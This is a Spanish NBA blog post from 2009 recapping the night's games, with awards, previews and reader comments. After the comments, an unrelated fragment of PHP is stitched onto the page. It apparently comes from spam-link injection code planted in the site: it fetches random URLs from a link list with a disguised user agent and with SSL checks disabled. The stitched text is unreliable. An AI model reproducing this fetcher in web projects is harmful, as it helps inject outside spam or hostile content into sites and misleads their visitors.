La crónica (30/03/2009)

31 de March de 2009 por TheDeerHunter

No habían excesivos alicientes anoche para perder horas de sueño. Jornada ligera, como si fuera jueves pero con partidos reguleros.

La excepción, el Orlando@Miami donde además, retiraban la camiseta a Zo. La cosa iba de centers de leyenda. Alonzo Mourning, comparado con otros pívots contemporáneos, nunca fue un dechado de talento. Lo que hará que alguno le recordemos como uno de los mejores que hemos visto es su coraje, el mayor que nadie haya mostrado en una cancha de baloncesto. Si alguien se merece el homenaje y el anillo que luce orgulloso, ese es el bueno de Alonzo.

No pudieron los Heat brindarle la victoria en otro de esos partidos de Wade contra todo/s. Seguramente sí se la dedicaría respetuosamente Dwight Howard como digno heredero de aquellos pívots de otra época. El jugador más joven en alcanzar los 5.000 rebotes superando por mucho a un tal Chamberlain. Y luego hay quien dice que ya no hay figuras como las de antaño.

El otro único equipo que se jugaba algo anoche era Utah, en Salt Lake, recibiendo a los Knicks. Se auguraba palizón y cerca estuvo de producirse pero inesperadamente los locales levantaron el pie del acelerador dilapidando una ventaja de 24 puntos. Pero los actuales Jazz son mucha tela y cerraron la 12ª victoria consecutiva en casa sin mayores dificultades. Excelentes Williams&Boozer como también Korver&Millsap desde la segunda línea. Menudo equipazo.

Los otros dos choques… bacalá, pero al menos nos lo pasamos bien en el bonito duelo Mayo-Monta Ellis que tanto le gustaría a Viva. Bastante bien Marc y la inédita pareja Haddadi-Warrick. Victoria para Memphis, por cierto. Fue bastante más divertido que el Milwaukee@New Jersey, donde en realidad no hubo partido. Richard Jefferson machacó sin piedad a su ex-equipo con Vince&Harris mentalmente de vacaciones.

PREMIOS

MVP: Grande Dwight Howard demostrando que no sólo Lebron bate los récords y buen papel de la pareja Williams&Boozer en el mejor momento de su última temporada juntos. Se lo daremos a Richard Jefferson que le endosó 29ptos y 10 rebotes a sus ex. Eso sí, os confieso que lo hubiera metido en el mayor esfuerzo en vano, pues para lo que se juegan los Bucks ahora mismo…

Rookie: Jugaron muy bien la mayoría. Chalmers en la derrota de Miami. En un partido tristísimo de su equipo, Brook estuvo bien, con Douglas-Roberts como líder con el olvidado jugador de los Bucks, Joe Alexander, contribuyendo a su derrota. Marc Gasol estuvo correcto en la victoria de Memphis, así como Hadadi, pero quien más méritos hizo para lograr el galardón fue OJ Mayo, recordándonos su mejor versión de hace un par de meses.

La Sorpresa: Ya hemos mencionado varias. No estamos demasiado acostumbrados a tan excelsas actuaciones de gente como Alexander o Douglas-Roberts, pero lo del iraní Haddadi es de traca, con 10 ptos inmaculados y 8 rebotes en 10 minutos de juego.

La decepción: No sabemos qué pudo pasarles a la pareja Harris&Carter que se pusieron de acuerdo en clavar un 3-11 cada uno. Qué larga que se les está haciendo la temporada a los aficionados de New Jersey… Con lo bien que había empezado.

El mayor esfuerzo en vano: Dwyane Wade enchufó 42 puntacos para nada. Menuda desesperación de cara a playoffs.

RAZONES PARA TRASNOCHAR

Esta próxima madrugada sí hay bastante tela que cortar:

El Utah@Portland es un partido de alto standing, con dos equipos en buen estado de forma, el ambiente del Rose Garden, el posible enfrentamiento en playoffs en el aire… Todos los ingredientes para ser un buen partido. Eso sí, es a la 4 de la mañana, pero uno siempre puede madrugar para ver la segunda parte.

Otro plato más asequible es el Atlanta@Philadelphia, a la 1 A.M. Otro posible aperitivo de primera ronda, en un partido de esos a cara de perro que tanto nos gusta y jugadas por encima del aro a cascoporro.

El jugador a seguir esta noche es uno de los proscritos, Carmelo Anthony, que durante las últimas semanas está jugando muy bien. Y esta noche se enfrenta a los Knicks, la fiesta de las magdalenas.

LA PREGUNTA DEL DÍA

¿Flor de un día la actuación del iraní Hamed Haddadi o aquí hay jugador?

Comenta

4 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Yo vi el ultimo cuarto de memphis que es cuando jugo el irani, y lo hizo muy bien siempre que acumula minutos lo hace bien, yo pienso que si que hay jugador, y mas para los ositos.

      Citar

  2. Viva_Dirk dice:
    #2

    Hay que darle muchíiiiiiiiiiiiisimo tiempo al iraní.

      Citar

  3. JJ5 dice:
    #3

    Douglas-Roberts tiene un potencial que ni él mismo se lo cree.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Hamed Haddadi a.k.a. el Sabonis de los montes Zagros

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>